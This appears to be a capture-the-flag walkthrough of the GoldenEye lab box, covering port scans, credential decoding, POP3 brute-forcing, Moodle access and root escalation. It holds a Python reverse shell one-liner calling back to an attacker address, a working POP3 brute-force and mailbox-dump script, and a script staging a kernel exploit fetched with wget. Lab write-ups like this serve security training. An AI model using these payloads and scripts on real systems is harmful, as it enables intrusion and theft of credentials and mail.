1. Host discovery
Running netdiscover on the local segment finds the target at 192.168.203.151.
2. Port scanning
root@kali:~# nmap -sS -A 192.168.203.151 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 01:47 EST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.151
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
| https://www.ietf.org/rfc/rfc2246.txt
|
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: CVE:CVE-2015-4000 BID:74733
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://weakdh.org
| https://www.securityfocus.com/bid/74733
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.7:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
MAC Address: 00:0C:29:BD:2F:E3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.203.151
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 389.82 seconds
That did not turn up much, so I scanned the full port range as well:
root@kali:~# nmap -sS -p1-65535 192.168.203.151
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 01:54 EST
Nmap scan report for 192.168.203.151
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
MAC Address: 00:0C:29:BD:2F:E3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.96 seconds
So the server exposes four ports: 25, 80, 55006 and 55007. Port 25 is Postfix SMTP, used for sending mail. Note that the default nmap scan only covers the top 1000 ports and missed the two high ports entirely, so a full 1-65535 sweep is worth running even when the first scan looks complete.
3. Finding vulnerabilities
First the web service. The front page tells us to log in under the /sev-home/ directory, which prompts for a username and password.
A directory scan for sensitive files turns up nothing.
Looking further, the clue is in the page source: a username, Boris, and an obscured password. The password is not encrypted, only HTML entity encoded; decoding it (I used https://c.runoob.com/front-end/691) gives InvincibleHack3r.
Logging in with these credentials fails at first; changing Boris to lowercase boris makes the login succeed.
The page behind the login says to email a GNO supervisor, and that the POP3 service has been moved to a non-default high port.
Viewing this page's source gives more information:
Qualified GoldenEye Network Operator Supervisors:
Natalya
Boris
We already found two high ports, but not which of them is POP3, so probe them with nmap service detection (for example nmap -sV -p 55006,55007 192.168.203.151):
Port 55007 is the POP3 service.
Next, brute-force the POP3 service with hydra. Running both usernames in one hydra job can produce spurious results, so each account is attacked on its own (for example hydra -l natalya -P <wordlist> -s 55007 192.168.203.151 pop3).
That gives two sets of credentials:
natalya password: bird
boris password: secret1!
Connect to the service with nc (nc 192.168.203.151 55007).
Basic POP3 commands:
user <name> # supply the username
pass <password> # supply the password
stat # number of messages and total size in bytes
list # size of each message (or of one message: list n)
retr n # full text of message n
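As an added example (not part of the original write-up), here is the hydra-plus-nc step as a Python protocol exchange: a fake POP3 server, constructed for the example and supporting only USER/PASS/STAT/LIST/RETR/QUIT, and a poplib client that guesses one user's password, one connection per guess, then reads the mailbox with STAT and RETR. The usernames, passwords, mail contents and the localhost port are constructed assumptions; point the client functions at 192.168.203.151:55007 to use them against the real box.

```python
"""POP3 on a non-default port as a two-sided exchange: a tiny fake server
(constructed for this example) plus a poplib client that brute-forces one
user's password and then dumps the mailbox. All data below is made up."""
import poplib
import socketserver
import threading

FAKE_USERS = {"natalya": "bird"}                      # constructed credentials
FAKE_MAIL = {                                         # constructed mailbox
    "natalya": [
        "From: root@localhost\r\nSubject: one\r\n\r\nfirst message body",
        "From: boris@localhost\r\nSubject: two\r\n\r\nsecond message body",
    ]
}


class FakePOP3Handler(socketserver.StreamRequestHandler):
    """Server side: one command per line, '+OK'/'-ERR' replies, '.' ends multi-line data."""

    def send(self, line):
        self.wfile.write((line + "\r\n").encode())
        self.wfile.flush()

    def handle(self):
        user, authed = None, False
        self.send("+OK POP3 server ready")
        while True:
            raw = self.rfile.readline()
            if not raw:                               # client hung up
                return
            cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.send("+OK")
            elif cmd == "PASS":
                authed = FAKE_USERS.get(user) == arg
                self.send("+OK Logged in" if authed else "-ERR [AUTH] Authentication failed")
            elif cmd == "QUIT":
                self.send("+OK Bye")
                return
            elif not authed:
                self.send("-ERR Not authenticated")
            elif cmd == "STAT":
                msgs = FAKE_MAIL[user]
                self.send("+OK %d %d" % (len(msgs), sum(len(m) for m in msgs)))
            elif cmd == "LIST":
                msgs = FAKE_MAIL[user]
                self.send("+OK %d messages" % len(msgs))
                for i, m in enumerate(msgs, 1):
                    self.send("%d %d" % (i, len(m)))
                self.send(".")
            elif cmd == "RETR":
                body = FAKE_MAIL[user][int(arg) - 1]
                self.send("+OK %d octets" % len(body))
                for line in body.split("\r\n"):       # sample mail has no leading-dot lines
                    self.send(line)
                self.send(".")
            else:
                self.send("-ERR Unknown command")


def start_fake_pop3():
    """Start the fake server on an ephemeral localhost port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePOP3Handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def pop3_try_login(host, port, user, password, timeout=5):
    """Client side of USER/PASS; returns a logged-in connection or None."""
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)                          # raises error_proto on '-ERR'
        return conn
    except poplib.error_proto:
        conn.close()
        return None


def pop3_bruteforce(host, port, user, candidates):
    """One user, one guess per connection: what hydra -l USER -P LIST ... pop3 does."""
    for pw in candidates:
        conn = pop3_try_login(host, port, user, pw)
        if conn is not None:
            conn.quit()
            return pw
    return None


def pop3_dump_mailbox(host, port, user, password):
    """STAT, then RETR n for every message; returns the messages as text."""
    conn = pop3_try_login(host, port, user, password)
    if conn is None:
        raise PermissionError("login failed for %s" % user)
    try:
        count, _ = conn.stat()
        return [b"\r\n".join(conn.retr(n)[1]).decode() for n in range(1, count + 1)]
    finally:
        conn.quit()


if __name__ == "__main__":
    server, port = start_fake_pop3()
    pw = pop3_bruteforce("127.0.0.1", port, "natalya", ["password", "123456", "bird"])
    print("natalya password:", pw)
    for i, msg in enumerate(pop3_dump_mailbox("127.0.0.1", port, "natalya", pw), 1):
        print("--- message %d ---\n%s" % (i, msg))
    server.shutdown()
```

Each failed guess ends with the server's "-ERR" and a closed connection, which is exactly the pattern a defender sees in the mail log when hydra runs; against a real server add a delay between guesses, since many POP3 daemons rate-limit or tarpit repeated authentication failures.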
Read the three messages in the first mailbox (boris) in turn:
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages….
This line shows that Xenia is the key to the next stage.
Next, log in to natalya's mailbox:
The second message contains xenia's credentials and asks us to edit the hosts file, mapping severnaya-station.com to the target, then visit severnaya-station.com/gnocertdir.
Visiting that hostname and logging in with xenia's credentials:
The site's icon identifies the CMS as Moodle, so check searchsploit for known exploits:
There are plenty, so next pin down the version from the marker on the Blog page:
None of the exploits seem to fit this version closely.
Looking for other leads, there is a message in xenia's own inbox:
It names doak, so brute-force doak's POP3 account with hydra; the password is goat:
Log in to doak's POP3 mailbox:
The mail there contains his web credentials, which we use to log in:
username: dr_doak
password: 4England!
One file is found among doak's private files:
Opening it reveals an image path: /dir007key/for-007.jpg
This is the image:
Run strings against it:
One of the strings is base64; decoding it gives xWinter1995x!, which should be the admin password. Try it:
The login succeeds, and the admin account has a great deal more functionality.
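As an added example (my code, not the write-up's), here is the decoding of both obscured credentials from this box in one script: html.unescape for the entity-encoded /sev-home/ password, and a strings(1)-style scanner that picks out and decodes the base64 run hidden in the JPEG while rejecting printable runs that are not well-formed base64 or do not decode to text. The entity string and the image bytes below are constructed samples (the real page source and image are not reproduced here), built so that they decode to the two values the write-up found.

```python
"""Recover HTML-entity-encoded and base64-encoded credentials from recon data.
ENTITY_ENCODED and FAKE_IMAGE are constructed samples, not the box's real files."""
import base64
import html
import re
import string

# Constructed: numeric entities as they might appear in an HTML comment
ENTITY_ENCODED = ("&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;"
                  "&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;")

# Constructed: JPEG-like bytes, two harmless printable strings, a base64 run that
# decodes to binary (should be filtered out) and one that decodes to the password
FAKE_IMAGE = (b"\xff\xd8\xff\xe1\x00\x16Exif\x00\x00"
              b"Adobe Photoshop CS6\x00\x01\x02"
              b"\x00\x00AAAAAAAA\x00\x80"
              b"eFdpbnRlcjE5OTV4IQ==\n"
              b"\xff\xd9")


def decode_html_entities(text):
    """Decode &#NN;, &#xHH; and named entities (&amp; etc.)."""
    return html.unescape(text)


def extract_strings(data, min_len=4):
    """Like strings(1): runs of at least min_len printable ASCII bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def looks_like_base64(token):
    """Base64 alphabet only, padding only at the end, length a multiple of 4."""
    return (re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token) is not None
            and len(token) % 4 == 0)


def decode_base64_candidates(data, min_len=8):
    """(token, plaintext) for every string in data that is base64 of printable text."""
    found = []
    for run in extract_strings(data, min_len):
        for token in run.split():          # a run like "Adobe Photoshop CS6" has several words
            if not looks_like_base64(token):
                continue
            try:
                raw = base64.b64decode(token, validate=True)
            except ValueError:             # binascii.Error is a ValueError subclass
                continue
            if raw and all(chr(b) in string.printable for b in raw):
                found.append((token, raw.decode("ascii")))
    return found


if __name__ == "__main__":
    print("entity-decoded password:", decode_html_entities(ENTITY_ENCODED))
    print("strings:", extract_strings(FAKE_IMAGE))
    for token, text in decode_base64_candidates(FAKE_IMAGE):
        print("base64 %s -> %s" % (token, text))
```

The printable-output filter is what keeps the scanner useful on a real image: JPEG and EXIF data contain plenty of eight-character runs of letters that are valid base64 by shape but decode to noise.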
4. Getting a shell
Locate the relevant setting and replace its value with a Python reverse shell. Start a listener on the attacker box first (for example nc -lvnp 7777) and use that box's address in the payload; here the attacker is 192.168.203.149.
The payload:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.203.149",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Then edit a blog post and click the spell-check icon to trigger the callback:
It did not connect the first time. Following another write-up, the spell engine must also be changed to PSpellShell:
After that, the reverse shell connects.
5. Privilege escalation
Once an interactive shell is obtained, every typed character is echoed twice; spawning a second reverse shell fixes it:
Privilege escalation uses a kernel exploit:
Look it up in searchsploit:
We use this script (37292.c):
The target has no gcc, but cc is available:
So edit the exploit, replacing gcc with cc. The edit has to be made in the source, not just in the compile command, because 37292.c calls gcc at run time (through system()) to build a helper shared object; with gcc missing, that call fails and the exploit does not work even if it compiled cleanly.
With the edit done, serve the file from Kali: python -m SimpleHTTPServer 8080
On the target, fetch the script with wget and compile it with cc: cc -o exp 37292.c
Finally, make the binary executable and run it. Privilege escalation succeeds: root, and the flag.
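As an added example (not the original author's script), the following POSIX shell script stages the exploit for a target that only has cc: it patches the runtime gcc call in the source, keeps a backup, and prints the commands to run on the target. It uses a constructed stand-in source file with the same shape of system() call rather than the real 37292.c, and assumes the attacker IP 192.168.203.149, port 8080 and /tmp paths.

```sh
#!/bin/sh
# Stage a kernel exploit for a target that has cc but no gcc. The exploit builds a
# helper shared object at run time by calling gcc through system(), so "gcc" must be
# patched in the source, not only on the compile command line. exp_stub.c below is a
# constructed stand-in with that one call; 192.168.203.149 and /tmp are assumptions.
set -eu

# First C compiler present on this host: gcc on Kali, typically only cc on the target.
pick_compiler() {
    for c in gcc cc; do
        if command -v "$c" >/dev/null 2>&1; then
            echo "$c"
            return 0
        fi
    done
    echo "no C compiler found" >&2
    return 1
}

# Rewrite every system("gcc ...") in an exploit source to use the given compiler and
# print how many calls were patched; a .orig backup is kept next to the file.
patch_runtime_compiler() {   # $1 = source file, $2 = compiler name
    sed -i.orig "s/system(\"gcc /system(\"$2 /g" "$1"
    grep -c "system(\"$2 " "$1"
}

# Constructed stand-in for the exploit source: only the runtime compiler call matters here.
write_stub() {   # $1 = path
    cat > "$1" <<'EOF'
#include <stdio.h>
#include <stdlib.h>
int main(void) {
    int rc = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    printf("helper build returned %d\n", rc);
    return rc;
}
EOF
}

# Commands to run on the target once the patched file is served from Kali on :8080.
target_commands() {   # $1 = file name, $2 = compiler available on the target
    cat <<EOF
wget http://192.168.203.149:8080/$1 -O /tmp/$1
$2 -o /tmp/exp /tmp/$1
chmod +x /tmp/exp && /tmp/exp
EOF
}

if [ "${1:-}" = "run" ]; then
    write_stub ./exp_stub.c
    n=$(patch_runtime_compiler ./exp_stub.c cc)
    echo "patched $n runtime compiler call(s); serve with: python -m SimpleHTTPServer 8080"
    echo "attacker compiler: $(pick_compiler); target side:"
    target_commands exp_stub.c cc
fi
```

Run it as sh stage.sh run on the attacker box; on the target, pick_compiler is the quick check for which compiler the patched call should name before you compile anything.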